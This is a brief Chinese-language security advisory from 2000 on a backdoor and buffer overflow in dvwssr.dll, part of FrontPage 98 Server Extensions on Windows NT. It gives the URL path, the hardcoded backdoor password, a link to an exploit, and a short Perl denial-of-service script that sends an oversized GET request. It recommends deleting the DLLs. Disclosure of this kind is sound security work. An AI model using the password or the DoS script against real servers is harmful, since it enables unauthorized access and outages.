MS IIS FronPage 98 Extensions的DLL文件漏洞发布时间:2000-04-14 更新时间:2000-04-14 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 受影响系统 WinNT详细描述 FrontPage98 Extension Server FOR NT中搭带的两DLL 文件dvwsr.dll,mtd21v.dll存在后门,一般安装了 FRONTPAGE98 FOR NT的服务就存在此漏洞,起DLL文件 漏洞路径是/_vti_bin/_vti_aut/dvwssr.dll,其访问的 需要密码,令人有趣的是密码居然是"Netscape enginners are weenies!",现在微软也承认此漏洞是他们设计的漏洞 。 测试代码 http://www.securityfocus.com/data/vulnerabilities /exploits/dvwssr.pl 另外, dvwssr.dll还存在缓冲溢出,容易被DOS攻击,对于 这个缓冲溢出的漏洞,可能能利用远程执行指令,但目前没 有可用的exploit出来。 有一个DOS的脚本: #!/usr/bin/perl print "GET /_vti_bin/_vti_aut/dvwssr.dll?"; print "a" x 5000; print " HTTP/1.1\nHost: yourhost\n\n"; 解决方案 删除这两个DLL文件 相关信息 |
